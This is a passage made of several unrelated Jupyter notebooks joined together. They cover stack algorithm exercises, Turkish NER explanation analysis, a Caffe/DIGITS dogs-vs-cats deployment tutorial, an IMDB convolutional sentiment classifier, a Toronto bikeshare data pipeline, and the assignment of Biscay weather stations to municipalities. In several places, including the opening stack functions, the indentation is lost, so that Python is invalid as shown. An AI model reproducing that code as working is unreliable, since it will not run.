output[0] = 1
for i in range(1, n) :
while (not isEmpty(stk)) and (price[top(stk)] < price[i]) :
stk.pop()
if isEmpty(stk) :
output[i] = i + 1
else :
output[i] = i - top(stk)
stk.append(i)
return output
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
def printList(arr) :
for i in range(len(arr)) :
print(arr[i], end = " ")
print()
def takeInput():
size = int(stdin.readline().strip())
if size == 0 :
return list(), 0
price = list(map(int, stdin.readline().strip().split(" ")))
return price, size
#main
price, n = takeInput()
output = stockSpan(price, n)
printList(output)
###Output
_____no_output_____
###Markdown
Minimum Bracket Reversal
###Code
from sys import stdin
def countBracketReversals(inputString) :
length = len(inputString)
if length == 0 :
return 0
if length % 2 != 0 :
return -1 # Only even number of brackets can be balanced
stack = list()
for i in range(length) :
currentChar = inputString[i]
if currentChar == '{' :
stack.append(currentChar)
else :
# Pop if there is a balanced pair
if (not isEmpty(stack)) and (top(stack) == '{') :
stack.pop()
else :
stack.append(currentChar)
count = 0
#Only unbalanced brackets are there in stack now
while not isEmpty(stack) :
char1 = stack.pop()
char2 = stack.pop()
'''
When char1 = } and char2 = {, then we need to reverse both of them
so count will increase by 2
'''
if char1 != char2 :
count += 2
else :
count += 1
return count
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
#main
print(countBracketReversals(stdin.readline().strip()))
###Output
_____no_output_____ |
toolkit/xnlp/Explanations Analysis Run 02 - Turkish.ipynb | ###Markdown
LOC type entities - analysis
###Code
loc_group_explanations = explanations[explanations['entity_type'] == "LOC"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
loc_group_explanations['Loc'].clip(lower=-1.0, upper=1, inplace=False)
len(morpho_tag_to_id)
loc_group_explanations.size
for idx, morpho_tag in enumerate(list(morpho_tag_to_id.keys())):
if idx % 9 == 0:
fig = plt.figure(int(idx/9))
rem = idx % 9
plt.subplot(3, 3, rem+1)
print(morpho_tag)
# sns.violinplot(data=list(loc_group_explanations[morpho_tag].clip(lower=-0.5, upper=0.5)))
data = loc_group_explanations[morpho_tag].dropna().clip(lower=-0.5, upper=0.5)
print(data)
if data.size > 0:
sns.distplot(data)
plt.show()
loc_group_explanations
mean_loc_group_explanations = loc_group_explanations.mean()
mean_loc_group_explanations.sort_values(ascending=False)
loc_group_explanations['Loc'].sort_values()[:10]
loc_group_explanations['Loc'].sort_values(ascending=False)[:10]
loc_group_explanations.hist(['Loc'], range=[-1, 1], bins=100)
loc_group_explanations.hist(['Loc'], range=[-0.015, 0.015], bins=100)
loc_group_explanations['Loc'].value_counts().sort_values(ascending=False)
[(loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0]).mean(),
(loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0]).mean()]
loc_group_explanations.hist(['Loc^DB'], range=[-1, 1])
loc_group_explanations.hist(['Loc'])
loc_group_explanations.hist(['Loc^DB'])
loc_group_explanations.hist(['Loc'], range=[-5000, -10], bins=100)
loc_group_explanations.hist(['Loc'], range=[1, 1000], bins=100)
loc_group_explanations['Loc'][loc_group_explanations['Loc'] < 0].count()
loc_group_explanations['Loc'][loc_group_explanations['Loc'] >= 0].count()
for morpho_tag in ['Loc', 'Loc^DB']:
below_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] < 0].count()
above_zero = loc_group_explanations[morpho_tag][loc_group_explanations[morpho_tag] >= 0].count()
print(morpho_tag, below_zero, above_zero)
###Output
Loc 2681 1818
Loc^DB 653 523
###Markdown
ORG type entities - analysis
###Code
org_group_explanations = explanations[explanations['entity_type'] == "ORG"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
org_group_explanations.mean().sort_values(ascending=False)
###Output
_____no_output_____
###Markdown
PER type entities - analysis
###Code
per_group_explanations = explanations[explanations['entity_type'] == "PER"].drop(["sentence_idx", "entity_type", "entity_start", "entity_end"], axis=1)
per_group_explanations.mean().sort_values(ascending=False)
!ls ../../explanations-for-ner-train-finnish-201901*
###Output
_____no_output_____ |
NVIDIA Training/Deployment.ipynb | ###Markdown
Deployment Which files constitute a "model"?We make a trained network useful by removing it from its training environment and "deploying" it into an application. Start where we left off in DIGITS.DIGITS places the files we need to deploy in a directory that can either be downloaded or just pointed to. Since we're going to be deploying our model on the same server where it was trained, we can just point to the folder path that DIGITS generates. Open DIGITS.From DIGITS home page, select the model that we named "Dogs vs. Cats".DIGITS' "Job Page" for the model is what you see as soon as you create the model, when it is training, and/or if you select the model under DIGITS' "model" tab. The Job Directory is in the top left.**Copy the job directory (highlighted above) and replace FIXME in the code block below. Once you've copied the directory, execute the cell (Shift+Enter) to store it to the variable MODEL_JOB_DIR**
###Code
MODEL_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your model
!ls $MODEL_JOB_DIR
###Output
_____no_output_____
###Markdown
Assuming you copied and pasted well, you will see a list of all files in that directory. If the following instructions do not match what you're seeing, check the copy/paste directions. Again, our "model" consists of two files: the architecture and the weights. The architecture is the file called ```deploy.prototxt``` and the weights are in the most recent snapshot file ```snapshot_iter_.caffemodel```. In this case, snapshot number 735 contains the weights learned after all 5 epochs.
###Code
ARCHITECTURE = MODEL_JOB_DIR + '/' + 'deploy.prototxt'
WEIGHTS = MODEL_JOB_DIR + '/' + 'snapshot_iter_735.caffemodel'
print ("Filepath to Architecture = " + ARCHITECTURE)
print("Filepath to weights = "+ WEIGHTS)
###Output
_____no_output_____
###Markdown
Next, we need to make sure that the program that we're building can both read and process those files. For this basic type of deployment, we'll need to install (or include) the framework that they were written in to be able to interpret them. We'll learn to deploy to environments that don't require installing the framework later in this course. We'll also need to use the GPU to take advantage of parallel processing. Again, our model consists of hundreds of thousands of operations that can be largely accelerated through parallelization.
###Code
import caffe
caffe.set_mode_gpu()
###Output
_____no_output_____
###Markdown
Next, we'll create a "Classifier" object called "net". The more common the workflow, the easier existing tools will make your project. In this case, image classification is very common, so this next code block simply takes your architecture file and weights file and a bit about the data and makes common actions easy.
###Code
# Initialize the Caffe model using the model trained in DIGITS
net = caffe.Classifier(ARCHITECTURE, WEIGHTS,
channel_swap =(2, 1, 0), #Color images have three channels, Red, Green, and Blue.
raw_scale=255) #Each pixel value is a number between 0 and 255
#Each "channel" of our images are 256 x 256
###Output
_____no_output_____
###Markdown
The Classifier class includes a method called "predict", which takes an input of an image as defined above and generates an output of the likelihood of the image belonging to each category. Creating an Expected Input: Preprocessing To start with something easy, let's attempt to correctly classify a labeled image from the dataset. We can load the image and view it by running the cell below.
###Code
import matplotlib.pyplot as plt #matplotlib.pyplot allows us to visualize results
input_image= caffe.io.load_image('/dli/data/dogscats/train/cats/cat.10941.jpg')
plt.imshow(input_image)
plt.show()
###Output
_____no_output_____
###Markdown
While this is the image we have, it is not the 'input' the network expects. To prepare data for inference, we're going to follow one golden rule: whatever was done prior to training must be done prior to inference. In the last section, you saw the files that were generated when DIGITS trained your model. In this section, we'll examine the files generated when DIGITS created your dataset. The job directory for the **dataset** you just trained from is found by selecting the dataset from the model page "Dogs and Cats" and/or if you select the dataset under DIGITS' "dataset" tab. It's in the same place it was for the model, but should be a different number. Replace FIXME with it and execute the code below to set DATA_JOB_DIR to the right filepath and examine what's inside:
###Code
DATA_JOB_DIR = '##FIXME##' ## Remember to set this to be the job directory for your dataset
!ls $DATA_JOB_DIR
###Output
_____no_output_____
###Markdown
Again, there is more information here than you need (for now). There is an infinite amount that you *could* know about data science and data prep, which will become clear as you work through a variety of deep learning problems. In this case, DIGITS did two steps prior to training. We call this *preprocessing.* 1) DIGITS resized the images to 256x256 color images
###Code
import cv2
input_image=cv2.resize(input_image, (256, 256), 0,0)
plt.imshow(input_image)
plt.show()
###Output
_____no_output_____
###Markdown
2) DIGITS *normalized* the images by subtracting the mean image from each image to reduce the computation necessary to train. Load the mean image and subtract it from the test image below:
###Code
mean_image = caffe.io.load_image(DATA_JOB_DIR+'/mean.jpg')
ready_image = input_image-mean_image
###Output
_____no_output_____
###Markdown
We've now taken data as it was and converted it into data that our network expects. Next, let's see what output our network creates. Forward Propagation: Using your modelThis is what we care about. Let's take a look at the function: prediction = net.predict([grid_square]).Like any [function](https://www.khanacademy.org/computing/computer-programming/programmingfunctions), net.predict passes an input, ready_image, and returns an output, prediction. Unlike other functions, this function isn't following a list of steps, instead, it's performing layer after layer of matrix math to transform an image into a vector of probabilities. Run the cell below to see the prediction from labeled the labeled data above.
###Code
# make prediction
prediction = net.predict([ready_image])
print(prediction)
###Output
_____no_output_____
###Markdown
Interesting, but doesn't contain all that much information. Our network took a normalized 256x256 color image and generated a vector of length 2. Generating a useful output: Postprocessing At this point, we can really build whatever we want. Your only limit is your programming experience. Before getting creative, let's build something basic. This code will determine whether our network output a higher value for the likelihood of "dog" than it did for "cat." If so, it will display an image that would be appropriate if a dog approached our simulated doggy door. If not, the image represents what we'd want to happen if our network determined a cat was at the door.
###Code
print("Input image:")
plt.imshow(input_image)
plt.show()
print("Output:")
if prediction.argmax()==0:
    print("Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif")
else:
    print("Welcome dog! https://www.flickr.com/photos/aidras/5379402670")
###Output
_____no_output_____
###Markdown
Here, now is everything in one place so you can test with an image that a doggy door might see.
###Code
##Create an input our network expects
input_image= caffe.io.load_image('/dli/data/fromnest.PNG')
input_image=cv2.resize(input_image, (256, 256), 0,0)
ready_image = input_image-mean_image
##Treat our network as a function that takes an input and generates an output
prediction = net.predict([ready_image])
print("Input Image:")
plt.imshow(input_image)
plt.show()
print(prediction)
##Create a useful output
print("Output:")
if prediction.argmax()==0:
    print("Sorry cat:( https://media.giphy.com/media/jb8aFEQk3tADS/giphy.gif")
else:
    print("Welcome dog! https://www.flickr.com/photos/aidras/5379402670")
###Output
_____no_output_____
###Markdown
Essentially, we've created a simulator for our doggy door challenge. We've created an application that takes an input from a camera, converts it to a data type our network expects, generates an output, and then converts that output into something useful to a user. You could see how you might easily have a positive output control a motor in a doggy door. With regard to deep learning, you have what you need! To see what other images you can try in the code block above, list the test images (images that weren't used for training) by running the command below. Expect some of these images to output the wrong classification. Test them until you're satisfied and then continue in the course to find out how to improve performance!
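As an aside (not part of the course files), the preprocess → predict → postprocess steps above could be collected into one helper so any image path can be tested with a single call. This is only a sketch and assumes the `caffe`, `cv2`, `net`, and `mean_image` objects already defined in this notebook; the listing command mentioned above follows right after it.

```python
def classify_image(image_path):
    """Sketch: preprocess an image, run the network, and interpret the output."""
    image = caffe.io.load_image(image_path)       # load as float RGB, values 0-1
    image = cv2.resize(image, (256, 256), 0, 0)   # match the training image size
    ready = image - mean_image                    # same normalization as training
    prediction = net.predict([ready])             # forward pass through the network
    return "dog" if prediction.argmax() == 1 else "cat"
```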
###Code
!ls /dli/data/dogscats/test
###Output
_____no_output_____
###Markdown
Putting it all together Let's put this deployment process together to see how it might look outside of this Jupyter notebook. In the Python file at [pythondeployment.py](../../../../edit/tasks/task3/task/pythondeployment.py), you'll see the same code as above, but consolidated into one file. You'll use this approach during your end of course assessment, so take a look. Insert the filepath to a test image here to visualize it.
###Code
TEST_IMAGE = '/dli/data/dogscats/test/1.jpg'
display= caffe.io.load_image(TEST_IMAGE)
plt.imshow(display)
plt.show()
###Output
_____no_output_____
###Markdown
And then run our small python application with that image as input below. Ignore most of the output and scroll to the bottom. (Even errors and warnings are fine.)
###Code
!python pythondeployment.py $TEST_IMAGE 2>/dev/null
###Output
_____no_output_____ |
notebooks/nlp/6_conv_net_sentiment_classifier_for_imdb.ipynb | ###Markdown
Convolutional Net for Sentiment Classification This Conv Net performs sentiment analysis on the IMDB review dataset.
###Code
import os
from tensorflow.keras.datasets import imdb
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Dropout, Activation
from tensorflow.keras.layers import Layer, Embedding, Conv1D, SpatialDropout1D, GlobalMaxPool1D
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping
from tensorflow.keras.models import load_model
import sklearn.metrics
from sklearn.metrics import roc_auc_score
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Set Hyperparameters
###Code
output_dir = 'model_output/conv'
epochs = 3
batch_size = 64
patience = 10
val_split = .3
n_dim = 192
n_unique_words = 8000
max_review_length = 200
pad_type = trunc_type = 'pre'
n_conv = 128
k_conv = 3
n_dense = 256
dropout = 0.5
###Output
_____no_output_____
###Markdown
Load Data
###Code
(X_train, y_train), (X_valid, y_valid) = imdb.load_data(num_words=n_unique_words)
###Output
_____no_output_____
###Markdown
Preprocess Data
###Code
X_train = pad_sequences(X_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
X_valid = pad_sequences(X_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0)
###Output
_____no_output_____
###Markdown
Design Conv Net Architecture
###Code
model = Sequential()
model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length))
model.add(Conv1D(n_conv, k_conv, activation='relu'))
model.add(GlobalMaxPool1D())
model.add(Dense(n_dense, activation='relu'))
model.add(Dense(n_dense, activation='relu'))
model.add(Dropout(dropout))
model.add(Dense(1, activation='sigmoid'))
model.summary()
###Output
_____no_output_____
###Markdown
Configure the Model
###Code
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
modelCheckpoint = ModelCheckpoint(monitor='val_accuracy', filepath=output_dir + '/imdb-cnn.hdf5', save_best_only=True, mode='max')
earlyStopping = EarlyStopping(monitor='val_accuracy', mode='max', patience=patience)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
###Output
_____no_output_____
###Markdown
TensorBoard
###Code
tensorboard = TensorBoard("../logs/imdb-cnn")
###Output
_____no_output_____
###Markdown
Train the Model
###Code
history = model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,
verbose=1, validation_split=val_split, callbacks=[modelCheckpoint, earlyStopping, tensorboard])
###Output
_____no_output_____
###Markdown
Evaluate
###Code
model = load_model(output_dir+'/imdb-cnn.hdf5')
y_hat = model.predict_proba(X_valid)
final_loss, final_acc = model.evaluate(X_valid, y_valid, verbose = 2)
print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc))
plt.hist(y_hat)
_ = plt.axvline(x=0.5, color='orange')
pct_auc = roc_auc_score(y_valid, y_hat) * 100
print('{:0.2f}'.format(pct_auc))
print(np.std(history.history['loss']))
fpr, tpr, _ = sklearn.metrics.roc_curve(y_valid, y_hat)
roc_auc = sklearn.metrics.auc(fpr, tpr)
plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc="lower right")
plt.show()
###Output
_____no_output_____ |
v1/notebooks/3_data_pipeline_get_data.ipynb | ###Markdown
Data Pipeline to Get Data
###Code
%load_ext lab_black
%load_ext autoreload
%autoreload 2
import pandas as pd
from prefect import Flow
###Output
_____no_output_____
###Markdown
About Use a data pipeline to assemble the data used in the dashboard. User Inputs
###Code
open_tor_data_url = (
"https://ckan0.cf.opendata.inter.prod-toronto.ca/api/3/action/package_show"
)
trips_data_glob_str = "data/raw/*.csv"
stations_params = {"id": "2b44db0d-eea9-442d-b038-79335368ad5a"}
stations_cols_wanted = [
"station_id",
"name",
"physical_configuration",
"lat",
"lon",
"altitude",
"address",
"capacity",
"physicalkey",
"transitcard",
"creditcard",
"phone",
]
neigh_profile_params = {"id": "6e19a90f-971c-46b3-852c-0c48c436d1fc"}
pt_params = {"id": "7795b45e-e65a-4465-81fc-c36b9dfff169"}
poi_params = {"id": "965247c0-c72e-49b4-bb1a-879cf98e1a32"}
ch_params = {"id": "c7be2ee7-d317-4a28-8cbe-bff1ce116b46"}
neigh_boundary_params = {"id": "4def3f65-2a65-4a4f-83c4-b2a4aed72d46"}
neigh_cols_to_show = [
"AREA_ID",
"AREA_SHORT_CODE",
"AREA_LONG_CODE",
"AREA_NAME",
"Shape__Area",
"Shape__Length",
"LATITUDE",
"AREA_LATITUDE",
"LONGITUDE",
"AREA_LONGITUDE",
"geometry",
]
trips_nan_cols = [
"START_STATION_ID",
"END_STATION_ID",
"START_STATION_NAME",
"END_STATION_NAME",
]
trips_duplicated_cols = ["TRIP_ID", "START_TIME", "END_TIME"]
cols = ["STATION_NAME", "year", "month", "day", "hour"]
# Exporting to staged CSV files
cols_to_export = [
"STATION_NAME",
"YEAR",
"MONTH",
"DAY",
"HOUR",
"USER_TYPE",
"NUM_TRIPS",
"DURATION_MEAN",
"AREA_NAME",
"PHYSICAL_CONFIGURATION",
"CAPACITY",
"PHYSICALKEY",
"TRANSITCARD",
"CREDITCARD",
"PHONE",
"NEIGH_TRANSIT_STOPS",
"NEIGH_COLLEGES_UNIVS",
"NEIGH_CULTURAL_ATTRACTIONS",
"NEIGH_PLACES_OF_INTEREST",
]
nrows_per_staged_csv_file = 350_000
%aimport src.data_pipe_utils
import src.data_pipe_utils as dpu
###Output
/home/elsdes3/Downloads/bikeshare-dash/.tox/build/lib/python3.9/site-packages/geopandas/_compat.py:111: UserWarning: The Shapely GEOS version (3.10.2-CAPI-1.16.0) is incompatible with the GEOS version PyGEOS was compiled with (3.10.0-CAPI-1.16.0). Conversions between both will be slow.
warnings.warn(
###Markdown
Data Pipeline Define Pipeline
###Code
with Flow("My Functional Flow") as flow:
df_stations = dpu.get_bikeshare_stations_metadata(
open_tor_data_url,
stations_params,
stations_cols_wanted,
)
df = dpu.get_bikeshare_trips_data(
trips_data_glob_str,
trips_nan_cols,
trips_duplicated_cols,
)
dfch_essentials = dpu.get_city_cultural_hotspots_data(open_tor_data_url, ch_params)
df_poi = dpu.get_city_points_of_interest_data(open_tor_data_url, poi_params)
gdf = dpu.get_city_neighbourhood_boundary_data(
open_tor_data_url,
neigh_boundary_params,
neigh_cols_to_show,
)
df_pt_slice = dpu.get_city_public_transit_locations_data(
open_tor_data_url, pt_params
)
df_coll_univ = dpu.get_city_college_university_locations_data()
df_neigh_demog = dpu.get_neighbourhood_profile_data(
open_tor_data_url, neigh_profile_params
)
(
df_poi_new,
dfch_essentials_new,
df_coll_univ_new,
df_pt_slice_new,
df_neigh_stats,
df_stations_new,
) = dpu.aggregate_data(
gdf,
df_poi,
dfch_essentials,
df_coll_univ,
df_pt_slice,
df_neigh_demog,
df_stations,
)
df_hour_by_station_merged = dpu.combine_trips_neighbourhood_data(
df, cols, df_stations_new
)
dpu.export_aggregated_data_multiple_csvs(
df_hour_by_station_merged,
cols_to_export,
nrows_per_staged_csv_file,
)
###Output
_____no_output_____
###Markdown
Run Pipeline
###Code
%%time
state = flow.run()
%%time
# print(state.result[gdf].shape)
# display(state.result[gdf].result.describe())
display(state.result[df_neigh_demog].result.describe())
# display(state.result[df_poi_new].result.describe())
# display(state.result[dfch_essentials_new].result.describe())
# display(state.result[df_coll_univ_new].result.describe())
# display(state.result[df_pt_slice_new].result.describe())
with pd.option_context('display.max_columns', 100):
display(state.result[df_neigh_stats].result.describe())
display(state.result[df_stations_new].result.describe())
display(state.result[df_hour_by_station_merged].result.describe())
###Output
_____no_output_____ |
B_Submissions_Kopuru_competition/2021-05-12_submit/batch_OLSyears/workerbee01_HONEYCOMB.ipynb | ###Markdown
Challenge: Assigning Weather Stations to each Municipality **OBJECTIVE: We have 102 weather stations, and each of those stations must be assigned to one of the 112 Biscay Province Municipalities.** Note: a weather station may be shared by multiple Municipalities. **Assumptions:** * We will take the center coordinates of each Municipality as a reference point, because it represents an average central position of the area. * We will use the ETRS89 / UTM zone 30N projection (EPSG:25830), with coordinates in UTM, because: - The client data is already in UTM; - Working in UTM will give distance results in meters directly; - This projection is good for large scale analysis. **Note:** For more precision we could use the Plate Carrée projection (EPSG:32663), designed specifically to preserve distances on a map. (This task is still pending and we would only see tiny differences in the absolute values, which from a business perspective we do not require for this exercise.) Rationale / Engine The idea will be to use GeoPandas to solve this problem, where we can use the library methods to calculate distances and iterate over them, thus avoiding having to go through a very manual process and generating higher accuracy. We need: 1) A **GeoDataFrame** with a shapely geometry object for the **Biscay Municipalities** (which we already have from Maps Exploration); 2) A **GeoDataFrame** with a shapely geometry object for the **Weather Stations** (we only have a CSV file with the weather stations' UTM coordinates, so we will have to create our own GeoDataFrame). Start by importing the data. Biscay Province GDF / Shapefile **Load Map from Spain and Basque Country as it might be useful**
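Before loading the real data, here is a minimal toy sketch (made-up coordinates and hypothetical station names, not the client data) of the single GeoPandas operation everything below builds on: picking the station whose distance to a municipality's centre point is smallest. The actual Biscay shapefile is loaded next.

```python
import geopandas as gpd
from shapely.geometry import Point

# two made-up stations in EPSG:25830 (UTM, so distances come out in meters)
stations_demo = gpd.GeoDataFrame(
    {"station": ["A", "B"]},
    geometry=[Point(505000, 4790000), Point(520000, 4780000)],
    crs="EPSG:25830",
)
municipality_centre = Point(506000, 4789000)  # a made-up municipality centroid

closest = stations_demo.geometry.distance(municipality_centre).idxmin()
print(stations_demo.loc[closest, "station"])  # -> "A", roughly 1.4 km away
```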
###Code
# Municipality shapefile (that we can read as GeoDataFrame) that we have already worked with before to get the maps
biscay_gdf = gpd.read_file('../../../Other_open_data/shapefiles/biscay/geodataframe_biscay_municipalities.shp')
biscay_gdf.rename({"municipali":"municipality","code_munic":"code_municipality"}, axis=1, inplace=True)
'''Add coordinates for the center of each Municipality, taken as the average central point of the region.
This will be used as the distance reference (as recommended by JC)'''
biscay_gdf["UTM_points"] = biscay_gdf.geometry.centroid
#inspection of Biscay GDF
biscay_gdf.info()
###Output
<class 'geopandas.geodataframe.GeoDataFrame'>
RangeIndex: 112 entries, 0 to 111
Data columns (total 4 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 municipality 112 non-null object
1 code_municipality 112 non-null object
2 geometry 112 non-null geometry
3 UTM_points 112 non-null geometry
dtypes: geometry(2), object(2)
memory usage: 3.6+ KB
###Markdown
Weather Stations GDF / Shapefile
###Code
# Load the stations CSV we have from client, we will need to work this into a GeoDataFrame
stations_df = pd.read_csv("../../../Input_open_data/ds05_LOCALIZACION-ESTACIONES-METEOROLOGICAS.csv",sep=";")
#Convert column names to lower case for practical reason
stations_df.columns = stations_df.columns.str.lower()
#Set index as Station, Station Code and Station type because it will be useful to get the closest municipality
stations_df.set_index(["estacion","codigo","tipo"], inplace=True)
###Output
_____no_output_____
###Markdown
Now create a new column that will use the Point method from package shapely.geometry
###Code
stations_df["UTM_points"] = [Point(x, y) for x, y in zip(stations_df.xutm, stations_df.yutm)]
###Output
_____no_output_____
###Markdown
Convert it to a GeoDataFrame so we can make our desired calculations (point distances).
###Code
#Create a GeoDataFrame that can be saved as Shapefile and Inspect it
stations_gdf = gpd.GeoDataFrame(stations_df, crs="EPSG:25830", geometry=stations_df.UTM_points)
stations_gdf.info()
###Output
<class 'geopandas.geodataframe.GeoDataFrame'>
MultiIndex: 102 entries, ('Abetxuko', 'C076', 'A') to ('Zizurkil', 'C029', 'M')
Data columns (total 5 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 xutm 102 non-null int64
1 yutm 102 non-null int64
2 cota (m) 102 non-null int64
3 UTM_points 102 non-null object
4 geometry 102 non-null geometry
dtypes: geometry(1), int64(3), object(1)
memory usage: 14.3+ KB
###Markdown
Quick Data Visualization of Weather Stations vs Municipalities Plot the 2 GeoDataFrames to get an image of how many meteo stations from our dataset are located within the Biscay region. - We can clearly see that most meteo stations lie outside the Biscay Province. - We can confirm that only 30 stations are within the Biscay Province.
###Code
# Load Basque Country GDF / Shapefile so we can:
# add texture to the map and it does not plot blank areas for Weather Stations that lie outside Biscay Province
#Load Spain Map GeoDataframe & Set projection to UTM (same as we have in our map exploration)
spain_provinces_gdf = gpd.read_file("../../../Other_open_data/shapefiles/spain/gadm36_ESP_2.shx")
spain_provinces_gdf.to_crs("EPSG:25830",inplace=True)
spain_provinces_gdf.set_crs("EPSG:25830",inplace=True)
# Slice GeoDataframe for Basque Country only
basque_country_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1 == "País Vasco",:]
# Slice GeoDataFrame for surrounding regions (it gives nicer maps plots)
surrounding_regions_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1.isin(["Cantabria","País Vasco","Castilla y León"]),:]
##############################################################################################################
# Save the sliced GDFs to shapefiles that we can use later if needed for other maps explorations (only used 1)
#basque_country_gdf.to_file("basque_country_UTM", driver='ESRI Shapefile')
#surrounding_regions_gdf.to_file("cantabria_paisvasco_castillayleon_UTM", driver='ESRI Shapefile')
# Create Basemap of Basque Country
ax = basque_country_gdf.plot(figsize=(20, 20), zorder=2, color='gainsboro', edgecolor='#737373')
# Add layer of Spain Map for more texture.
spain_provinces_gdf.plot(zorder=1, color='White', edgecolor='#737373', ax=ax)
# Create base map of Biscay Provinces
biscay_gdf.geometry.plot(zorder=3, color='#ffffd4', edgecolor='#bf5b17', ax=ax)
# Add wasp locations map
stations_gdf.plot(label="Weather Stations location", color='#cc4c02', zorder=4, markersize=45, ax=ax)
# Set legends
ax.legend(loc='best', shadow=True, fontsize='xx-large', markerscale = 2)
# Set axis titles
ax.set_title('Location of Weather Stations within the Basque Country',
pad = 20,
fontdict={'fontsize':25, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16})
ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16})
ax.set_xlim(461500, 605000)
ax.set_ylim(4700900, 4813000)
ax.set_facecolor('#4292c6')
plt.show()
#plt.savefig('weather_stations_map.png')
stations_gdf_clipped = gpd.clip(stations_gdf, biscay_gdf)
# Create base map of Biscay Provinces
ax = biscay_gdf.geometry.plot(figsize=(15, 15), zorder=1, color='#ffffcc', edgecolor='#bf5b17')
# Add wasp locations map
stations_gdf_clipped.plot(label="Weather Stations location", color='red', zorder=5, markersize=20, ax=ax)
# Set axis titles
ax.set_title('Weather Stations in the Biscay Province (YTD)',
pad = 20,
fontdict={'fontsize':20, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)')
ax.set_ylabel('Latitude (UMT)')
plt.show()
###Output
_____no_output_____
###Markdown
The Actual Python Script Template to Assign Weather Stations Now that we have both GeoDataFrames we need to calculate the distances between points using the .distance() method. We test it for the 1st Municipality in the Biscay GeoDataFrame. 1) For the first Municipality (Gordexola) in the Biscay Municipality GeoDataFrame (the 0 index position), 2) We calculate the distances between all stations and find the Station index with the lowest value.
###Code
stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"])
# From the output we confirm that it creates a series with distances for all stations for Gordexola (0 based index) municipality
biscay_gordexola = stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]).idxmin()
biscay_gordexola
#From the series we select the one with the minimum distance.
#The output shows that the closest station for Gordexola is Soudpe-Herrerias.
###Output
_____no_output_____
###Markdown
- **Now that we have the formula for 1 Municipality, we want to iterate through all municipalities so we don't have to go 1 by 1 through all 112.** - **We create a For Loop that will give the minimum distances for all Municipalities.**
###Code
'''Create a for loop to iterate through each Minicipality.
The loop is calculating:
1) the distance of each station for i0(Gordexola) and giving the index of the station where the distance is minimized,
2) then the distance of each station for i1(Gexto) and giving the index of the station where the distance is minimized
3) etc... until it reaches the end of the Municipality GeoDataFrame which has 1 unique Municipality as an Index'''
closest_stations_list = []
for i in biscay_gdf.UTM_points:
closest_stations_list.append(stations_gdf.geometry.distance(i).idxmin())
'''
IDEA TO CORRECT WEATHER STATIONS WITH MISSING VALUES (sketch, not executed here;
assumes a `meteo` DataFrame loaded from WBds02_METEO.csv with a `station_code` column):

closest_stations_list = []
for i in biscay_gdf.UTM_points:
    # two nearest stations; each index entry is a (station, code, type) tuple
    candidates = stations_gdf.geometry.distance(i).nsmallest(n=2, keep="first").index
    if candidates[0][1] not in meteo.station_code.values:
        closest_stations_list.append(candidates[1])  # fall back to the 2nd-closest station
    else:
        closest_stations_list.append(candidates[0])
'''
# Create a new series with the new list
closest_stations_series = pd.Series(closest_stations_list,name="closest_station")
# Add the newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["closest_station"] = closest_stations_series
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097 = stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index[1]
biscay_basauri_48015 = stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index[1]
biscay_galdakao_48036 = stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index[1]
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"closest_station"] = biscay_zaratamo_48097
biscay_gdf.at[23,"closest_station"] = biscay_basauri_48015
biscay_gdf.at[41,"closest_station"] = biscay_galdakao_48036
###Output
97 POINT (510759.931 4783835.490)
Name: UTM_points, dtype: geometry
23 POINT (509085.637 4786507.059)
Name: UTM_points, dtype: geometry
